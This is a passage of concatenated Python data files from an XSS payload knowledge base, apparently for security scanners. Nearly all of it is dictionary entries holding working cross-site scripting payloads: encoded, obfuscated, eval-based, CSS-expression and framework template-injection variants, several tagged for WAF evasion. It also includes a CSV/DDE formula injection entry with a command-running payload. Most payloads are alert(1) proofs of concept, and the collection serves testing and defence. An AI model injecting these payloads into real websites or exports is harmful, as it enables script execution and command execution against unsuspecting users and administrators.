    "encoding_068": PayloadEntry(
        payload="&#60;scr%69pt&#62;alert(1)&#60;/scr%69pt&#62;",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_069": PayloadEntry(
        payload="\\u003Cscript\\u003E%61%6C%65%72%74(1)\\u003C/script\\u003E",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_070": PayloadEntry(
        payload="%3Cscript%3E\\u0061\\u006C\\u0065\\u0072\\u0074(1)%3C/script%3E",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_071": PayloadEntry(
        payload="&#60;script&#62;\\u0061\\u006C\\u0065\\u0072\\u0074(1)&#60;/script&#62;",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_072": PayloadEntry(
        payload="&lt;script&gt;\\x61\\x6C\\x65\\x72\\x74(1)&lt;/script&gt;",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_073": PayloadEntry(
        payload="%64%61%74%61%3A%74%65%78%74%2F%68%74%6D%6C%3B%62%61%73%65%36%34%2C%50%48%4E%6A%63%6D%6C%77%64%44%35%68%62%47%56%79%64%43%67%78%4B%54%77%76%63%32%4E%79%61%58%42%30%50%67%3D%3D",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_074": PayloadEntry(
        payload="<style>\\61 \\6C \\65 \\72 \\74 \\28 \\31 \\29</style><script>\\u0061\\u006C\\u0065\\u0072\\u0074(1)</script>",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_075": PayloadEntry(
        payload="%25%33%43%73%63%72%69%70%74%25%33%45%61%6C%65%72%74%28%31%29%25%33%43%2F%73%63%72%69%70%74%25%33%45",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
}



#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Refactored
Telegram: https://t.me/EasyProTech

Context Specific Core Payloads - Part 2
"""

from typing import Dict

from ..models import PayloadEntry


CONTEXT_SPECIFIC_CORE_PAYLOADS_PART2: Dict[str, PayloadEntry] = {
    "context_specific_036": PayloadEntry(
        payload='console.log("XSS")',
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_037": PayloadEntry(
        payload="window.alert(1)",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_038": PayloadEntry(
        payload='document.body.innerHTML="XSS"',
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_039": PayloadEntry(
        payload='location.href="javascript:alert(1)"',
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_040": PayloadEntry(
        payload='eval("alert(1)")',
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_041": PayloadEntry(
        payload='new Function("alert(1)")()',
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_042": PayloadEntry(
        payload='Array.constructor.constructor("alert(1)")()',
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_043": PayloadEntry(
        payload='Object.constructor.constructor("alert(1)")()',
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_044": PayloadEntry(
        payload="alert(1*1)",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_045": PayloadEntry(
        payload="alert(1+0)",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_046": PayloadEntry(
        payload="alert(1-0)",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_047": PayloadEntry(
        payload="alert(1/1)",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_048": PayloadEntry(
        payload="alert(1%2)",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_049": PayloadEntry(
        payload="alert(1&&1)",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_050": PayloadEntry(
        payload="alert(1||0)",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_051": PayloadEntry(
        payload="alert(!0)",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_052": PayloadEntry(
        payload="alert(!!1)",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_053": PayloadEntry(
        payload="expression(alert(String.fromCharCode(88,83,83)))",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_054": PayloadEntry(
        payload="expression(prompt(1))",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_055": PayloadEntry(
        payload="expression(confirm(1))",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_056": PayloadEntry(
        payload='url("javascript:alert(1)")',
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_057": PayloadEntry(
        payload="url(data:text/html,<script>alert(1)</script>)",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_058": PayloadEntry(
        payload='@import "javascript:alert(1)"',
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_059": PayloadEntry(
        payload="@import url(javascript:alert(1))",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_060": PayloadEntry(
        payload="src:url(javascript:alert(1))",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_061": PayloadEntry(
        payload="}</style><script>alert(1)</script><style>",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_062": PayloadEntry(
        payload="/*</style><script>alert(1)</script><style>/*",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_063": PayloadEntry(
        payload="*/</style><script>alert(1)</script><style>/*",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_064": PayloadEntry(
        payload="animation:xss 1s;@keyframes xss{from{transform:translateX(expression(alert(1)))}}",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_065": PayloadEntry(
        payload="transition:all 1s expression(alert(1))",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_066": PayloadEntry(
        payload="javascript:prompt(1)",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_067": PayloadEntry(
        payload="javascript:confirm(1)",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_068": PayloadEntry(
        payload="livescript:alert(1)",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_069": PayloadEntry(
        payload="mocha:alert(1)",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_070": PayloadEntry(
        payload="data:text/html,<svg onload=alert(1)>",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
}



#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Refactored
Telegram: https://t.me/EasyProTech

Advanced Core Payloads - Part 1
"""

from typing import Dict

from ..models import PayloadEntry


ADVANCED_CORE_PAYLOADS_PART1: Dict[str, PayloadEntry] = {
    "advanced_001": PayloadEntry(
        payload='<script>alert(atob("WFNT"))</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_002": PayloadEntry(
        payload='<script>alert(unescape("%58%53%53"))</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_003": PayloadEntry(
        payload='<script>alert(decodeURI("%58%53%53"))</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_004": PayloadEntry(
        payload='<script>alert(decodeURIComponent("%58%53%53"))</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_005": PayloadEntry(
        payload='<script>({}).constructor.constructor("alert(1)")()</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_006": PayloadEntry(
        payload='<script>(function(){}).constructor("alert(1)")()</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_007": PayloadEntry(
        payload='<script>Array.constructor.constructor("alert(1)")()</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_008": PayloadEntry(
        payload='<script>Object.constructor.constructor("alert(1)")()</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_009": PayloadEntry(
        payload='<script>Function.constructor("alert(1)")()</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_010": PayloadEntry(
        payload="<script>setTimeout(alert,1,1)</script>",
        contexts=["html_content", "javascript", "dom_xss_eval"],
        severity="critical",
        cvss_score=8.5,
        description="setTimeout with function reference and args - code execution",
        tags=["advanced", "setTimeout", "code-execution"],
        waf_evasion=True,
    ),
    "advanced_011": PayloadEntry(
        payload="<script>setInterval(alert,1,1)</script>",
        contexts=["html_content", "javascript", "dom_xss_eval"],
        severity="critical",
        cvss_score=8.5,
        description="setInterval with function reference and args - code execution",
        tags=["advanced", "setInterval", "code-execution"],
        waf_evasion=True,
    ),
    "advanced_012": PayloadEntry(
        payload="<script>requestAnimationFrame(alert.bind(null,1))</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_013": PayloadEntry(
        payload="<script>Promise.resolve().then(alert.bind(null,1))</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_014": PayloadEntry(
        payload="<script>new Promise(alert.bind(null,1))</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_015": PayloadEntry(
        payload="<script>eval`alert\\`1\\``</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_016": PayloadEntry(
        payload="<script>Function`alert\\`1\\```</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_017": PayloadEntry(
        payload="<script>setTimeout`alert\\`1\\``,1`</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_018": PayloadEntry(
        payload="<script>\\x61\\x6C\\x65\\x72\\x74(1)</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_019": PayloadEntry(
        payload='<script>eval("\\u0061\\u006C\\u0065\\u0072\\u0074(1)")</script>',
        contexts=["html_content", "javascript", "dom_xss_eval"],
        severity="critical",
        cvss_score=8.5,
        description="eval with unicode escape - code execution",
        tags=["advanced", "obfuscation", "eval", "code-execution"],
        waf_evasion=True,
    ),
    "advanced_020": PayloadEntry(
        payload='<script>eval("\\x61\\x6C\\x65\\x72\\x74(1)")</script>',
        contexts=["html_content", "javascript", "dom_xss_eval"],
        severity="critical",
        cvss_score=8.5,
        description="eval with hex escape - code execution",
        tags=["advanced", "obfuscation", "eval", "code-execution"],
        waf_evasion=True,
    ),
    "advanced_021": PayloadEntry(
        payload='<script>eval("\\141\\154\\145\\162\\164(1)")</script>',
        contexts=["html_content", "javascript", "dom_xss_eval"],
        severity="critical",
        cvss_score=8.5,
        description="eval with octal escape - code execution",
        tags=["advanced", "obfuscation", "eval", "code-execution"],
        waf_evasion=True,
    ),
    "advanced_022": PayloadEntry(
        payload="<script>\\141\\154\\145\\162\\164(1)</script>",
        contexts=["html_content", "javascript"],
        severity="critical",
        cvss_score=8.5,
        description="Octal escape in script - code execution",
        tags=["advanced", "obfuscation", "code-execution"],
        waf_evasion=True,
    ),
    "advanced_023": PayloadEntry(
        payload='<script>eval("ale"+"rt(1)")</script>',
        contexts=["html_content", "javascript", "dom_xss_eval"],
        severity="critical",
        cvss_score=8.5,
        description="eval with string concatenation - code execution",
        tags=["advanced", "obfuscation", "eval", "code-execution"],
        waf_evasion=True,
    ),
    "advanced_024": PayloadEntry(
        payload="<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>",
        contexts=["html_content", "javascript", "dom_xss_eval"],
        severity="critical",
        cvss_score=8.5,
        description="eval with fromCharCode - code execution",
        tags=["advanced", "obfuscation", "eval", "code-execution"],
        waf_evasion=True,
    ),
    "advanced_025": PayloadEntry(
        payload='<script>eval(atob("YWxlcnQoMSk="))</script>',
        contexts=["html_content", "javascript", "dom_xss_eval"],
        severity="critical",
        cvss_score=8.5,
        description="eval with base64 decode - code execution",
        tags=["advanced", "obfuscation", "eval", "base64", "code-execution"],
        waf_evasion=True,
    ),
    "advanced_026": PayloadEntry(
        payload='<script>eval(unescape("%61%6C%65%72%74%28%31%29"))</script>',
        contexts=["html_content", "javascript", "dom_xss_eval"],
        severity="critical",
        cvss_score=8.5,
        description="eval with URL decode - code execution",
        tags=["advanced", "obfuscation", "eval", "code-execution"],
        waf_evasion=True,
    ),
    "advanced_027": PayloadEntry(
        payload="'><script>alert(1)</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_028": PayloadEntry(
        payload="';alert(1);//",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_029": PayloadEntry(
        payload='";alert(1);//',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_030": PayloadEntry(
        payload="`><script>alert(1)</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_031": PayloadEntry(
        payload="</script><script>alert(1)</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_032": PayloadEntry(
        payload="</title><script>alert(1)</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_033": PayloadEntry(
        payload="</textarea><script>alert(1)</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_034": PayloadEntry(
        payload="</style><script>alert(1)</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_035": PayloadEntry(
        payload="</noscript><script>alert(1)</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_036": PayloadEntry(
        payload="</comment><script>alert(1)</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_037": PayloadEntry(
        payload=" onmouseover=alert(1) ",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_038": PayloadEntry(
        payload=" onclick=alert(1) ",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_039": PayloadEntry(
        payload=" onfocus=alert(1) ",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_040": PayloadEntry(
        payload=" onload=alert(1) ",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_041": PayloadEntry(
        payload=" onerror=alert(1) ",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_042": PayloadEntry(
        payload=" autofocus onfocus=alert(1) ",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_043": PayloadEntry(
        payload=" contenteditable onblur=alert(1) ",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_044": PayloadEntry(
        payload=" draggable ondragstart=alert(1) ",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_045": PayloadEntry(
        payload="vbscript:alert(1)",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_046": PayloadEntry(
        payload="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_047": PayloadEntry(
        payload="url(javascript:alert(1))",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_048": PayloadEntry(
        payload="/**/alert(1)/**/",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_049": PayloadEntry(
        payload=";alert(1);",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_050": PayloadEntry(
        payload="}alert(1);/*",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_051": PayloadEntry(
        payload="*{xss:expression(alert(1))}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_052": PayloadEntry(
        payload="<script>window[String.fromCharCode(97,108,101,114,116)](1)</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
}



#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2026-01-10 UTC
Status: Created
Telegram: https://t.me/EasyProTech

Office Context - CSV Injection / DDE
"""

DETAILS = {
    "title": "CSV Injection (Formula Injection)",
    "severity": "medium",
    "cvss_score": 6.8,
    "cvss_vector": "CVSS:3.1/AV:N/AC:M/PR:N/UI:R/S:U/C:H/I:H/A:L",
    "cwe": ["CWE-1236"],
    "owasp": ["A03:2021"],
    "description": (
        "Improper validation of CSV file content allowing execution of arbitrary commands "
        "via spreadsheet software (Excel, LibreOffice, Google Sheets). "
        "When a cell begins with special characters (=, +, -, @), the software "
        "interprets it as a formula or DDE (Dynamic Data Exchange) command."
    ),
    "attack_vector": (
        "Attacker inputs a payload like `=cmd|' /C calc'!A0` into a form field "
        "(e.g., User Name). When an admin exports the user list to CSV and opens it "
        "in Excel, the payload executes, potentially running shell commands on the "
        "admin's machine or exfiltrating data via external hyperlinks."
    ),
    "remediation": (
        "Escape cells beginning with =, +, -, @ by prepending a single quote (') "
        "or a tab character. Ensure the export function strictly treats fields as text. "
        "Configure spreadsheet software to disable DDE and external links by default."
    ),
    "references": [
        "https://owasp.org/www-community/attacks/CSV_Injection",
        "https://hackerone.com/reports/72785",
    ],
    "tags": ["csv", "injection", "excel", "dde", "formula-injection", "office"],
}



#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Refactored
Telegram: https://t.me/EasyProTech

Framework Specific Core Payloads - Part 2
"""

from typing import Dict

from ..models import PayloadEntry


FRAMEWORK_SPECIFIC_CORE_PAYLOADS_PART2: Dict[str, PayloadEntry] = {
    "framework_specific_043": PayloadEntry(
        payload="@focus=\"constructor.constructor('alert(1)')\" autofocus",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_044": PayloadEntry(
        payload="@mouseover=\"constructor.constructor('alert(1)')\"",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_045": PayloadEntry(
        payload="{{this.constructor.constructor('alert(1)')()}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_046": PayloadEntry(
        payload="{{$root.$el.ownerDocument.defaultView.alert(1)}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_047": PayloadEntry(
        payload="{{Object.constructor.constructor('alert(1)')()}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_048": PayloadEntry(
        payload="v-for=\"item in constructor.constructor('alert(1)')\"",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_049": PayloadEntry(
        payload="<slot>{{constructor.constructor('alert(1)')()}}</slot>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_050": PayloadEntry(
        payload="<component :is=\"constructor.constructor('alert(1)')\"></component>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_051": PayloadEntry(
        payload='$("<script>alert(1)</script>").appendTo("body")',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_052": PayloadEntry(
        payload='$("<img src=x onerror=alert(1)>").appendTo("body")',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_053": PayloadEntry(
        payload='$("<svg onload=alert(1)>").appendTo("body")',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_054": PayloadEntry(
